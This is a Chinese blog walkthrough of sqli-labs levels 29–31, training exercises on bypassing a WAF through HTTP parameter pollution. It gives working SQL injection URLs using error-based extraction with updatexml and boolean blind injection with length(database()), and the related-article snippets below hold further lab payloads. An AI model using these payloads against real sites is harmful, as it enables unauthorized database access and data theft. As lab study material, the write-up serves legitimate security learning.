sqli-labs第29~31关

最新推荐文章于 2024-09-09 09:47:53 发布
最新推荐文章于 2024-09-09 09:47:53 发布
阅读量346 收藏 5
点赞数 12
分类专栏: sqli-labs 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/140911600
版权

sqli-labs第29~31关问题为HTTP参数污染,不是select,union等过滤,而是需要waf绕过,但需要配置相应的环境如tomcat,防火墙才起效

http参数污染,拦截前面几个,只输入最后一个参数,如:

?id=1&&id=2

?id=1&&id=2&&id=3

1.第29关

29关为单引号注入,有报错信息

?id=1%27&&id=2%27%20order%20by%204--+

此关虽然有报错信息,但无法通过联合注入获取回显点,即不显示回显点

?id=1%27&&id=2%27%20union%20select%201,2,3--+

故采用基于报错的SQL注入

?id=1%27&&id=2%27%20and%20updatexml(1,concat(0x7e,database()),1)--+

2.第30关

第30关为双引号注入

id=2"或者id=1"&&id=2"都行

但此关无报错信息,可采用盲注

?id=2"and%20length(database())=8--+

或者

?id=1"&&id=2"and%20length(database())=8--+

3.第31关

第32关是双引号括号注入

?id=1"&&id=2")--+

也有报错信息

但同样不显示回显点

故采用基于报错的SQL注入,方法同29关一样,略 

熊熊爱吃不胖
关注
  • 12
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-29、30、31sqli-labs闯指南 29、30、31)—服务器(两层)架构
m0_54899775的博客
12-26 1882
sqli-labs Less-29、30、31sqli-labs闯指南 29、30、31)—服务器(两层)架构
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3240
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs/Less-29
m0_71299382的博客
11-20 251
sqli-labs第二十九题
sqli-labs进阶篇 29~31
Lucky小小吴的小屋
02-06 654
本文章主要讲述sqli-labs靶场第29到32的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli.labs靶场(29到40
喜欢创作各种技术类文章,希望可以帮到你
02-03 1156
id=1'id=1''尝试发现是单引号闭合,
SQLi LABS Less-29 联合注入
wangyuxiang946的博客
08-16 1万+
salilabs29SQLi-LABS第29使用GET请求提交参数,在url中构造payload即可
sqli-labs解题大法29 ~40
weixin_43733035的博客
01-24 786
Less-29: 这个…这一吧,我是没看出来有什么,可能只是单纯的想让我们了解一下waf。 这一order by 排序,可以;联合查询,可以。参考Less-1。 Background-6 服务器(两层)架构:http://www.cnblogs.com/lcamry/p/5762961.html Less-30: 与Less-29一样,双引号闭合"。 Less-31: 双引号加括号闭合
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1684
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs小游戏(1-20)详解
weixin_51356351的博客
10-22 974
第一 第一是联合查询注入 判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 http://localhost/sqli-labs-master/Less-1/?id=1’ – - http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- - http://localhost/sqli-labs-master/Less-1/?id=1’
sqli-labs靶场(23-38
weixin_51566481的博客
08-16 1189
sqli-labs,sql注入
sqli-labs-master前二十一到三十总结
Alexz__的博客
02-13 1292
第二十一: 通过抓包分析这里的cookie: 被base64加码算法加密了,懒得找闭合了直接看源码: 通过源码构造闭合,在某在线网站进行base64加密: JykgdW5pb24gc2VsZWN0IDEsMiwzICM= 直接爆出来显示位 ') union select 1,group_concat(schema_name),3 from ...
sqli-labs————Less-29
Fly_鹏程万里
05-19 852
Less-29从题目中可以了解到这个使用了WAF机制,那么我们可以看看该源文件内容:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3....
sqli-labs (less-29)
kukudeshuo的博客
03-13 715
sqli-labs (less-29) 进入29,输入ID=1 输入 http://127.0.0.1/sql1/Less-29/?id=1' #回显错误 根据错误显示,判断闭合方式为’–+,但是这里不就跟less-1一模一样了吗,我们打开less-29的源文件看看,发现不只一个页面 我们输入 http://127.0.0.1/sql1/Less-29/login.php?id=1 输入 http://127.0.0.1/sql1/Less-29/login.php?id=1' 这里意思为
spring事务详细讲解-深入浅出
小电玩
09-08 461
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
最新发布
万物皆有灵
09-09 831
在这个快速发展的数字时代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
jmeter之setUP、tearDown线程组
回家吃月饼的学习交流地
09-07 519
jmeter之setUP、tearDown线程组的使用
MYSQL
ABC1234567890ABM的博客
09-06 953
单列索引情况:根据下图可以看到,查询条件中有phone和name,他们都有单列索引,但是执行explain后发现真正只走了phone的索引,因为phone索引中没有name值,故还需回表走一次聚簇索引。为了避免DML在执行时,加的行锁与表锁的冲突,在InnoDB中引入了意向锁,使得表锁不用检查每行数据是否加锁,使用意向锁来减少表锁的检查。全局锁就是对整个数据库实例加锁,加锁后整个实例就处于只读状态,后续的DML的写语句,DDL语句,已经更新操作的事务提交语句都将被阻塞。表级锁,每次操作锁住整张表。
Warning: Use of undefined constant ‘root’ - assumed '‘root’' (this will throw an Error in a future version of PHP) in E:\phpstudy\phpstudy_pro\WWW\sqli-labs-master\sqli-labs-master\sql-connections\db-creds.inc on line 5 Fatal error: Uncaught Error: Call to undefined function mysql_connect() in E:\phpstudy\phpstudy_pro\WWW\sqli-labs-master\sqli-labs-master\sql-connections\setup-db.php:29 Stack trace: #0 {main} thrown in E:\phpstudy\phpstudy_pro\WWW\sqli-labs-master\sqli-labs-master\sql-connections\setup-db.php on line 29 这什么意思,哪里出错了
06-07
第二个错误提示中,指出了在文件 setup-db.php 的第 29 行出现了错误,即调用了一个未定义的函数 mysql_connect()。这是因为 PHP7.0 以上版本已经弃用了 mysql_* 系列函数,应该使用 mysqli_* 或 PDO 等函数来连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值